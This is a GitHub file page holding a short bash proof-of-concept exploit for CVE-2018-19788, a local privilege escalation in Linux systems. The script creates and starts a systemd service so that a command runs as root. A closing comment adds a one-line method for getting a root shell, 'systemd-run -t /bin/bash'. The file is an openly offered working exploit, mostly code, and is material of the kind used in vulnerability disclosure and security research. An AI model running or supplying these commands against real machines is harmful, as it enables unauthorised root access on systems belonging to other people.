Permalink
Switch branches/tags
Nothing to show
Find file Copy path
630902f Dec 8, 2018
1 contributor

Users who have contributed to this file

26 lines (20 sloc) 481 Bytes
#!/bin/bash
# PoC for CVE-2018-19788
# Rich Mirch
cat >woot.service<<EOF
[Unit]
Description=Woot
[Service]
Type=notify
ExecStart=/bin/bash -c "echo woot \$(id)|wall"
KillMode=process
Restart=on-failure
RestartSec=42s
[Install]
WantedBy=multi-user.target
EOF
systemctl link $PWD/woot.service
systemctl start woot
# @paragonsec discovered a much cleaner method to get root. Use this instead
# https://twitter.com/paragonsec/status/1071152249529884674
# systemd-run -t /bin/bash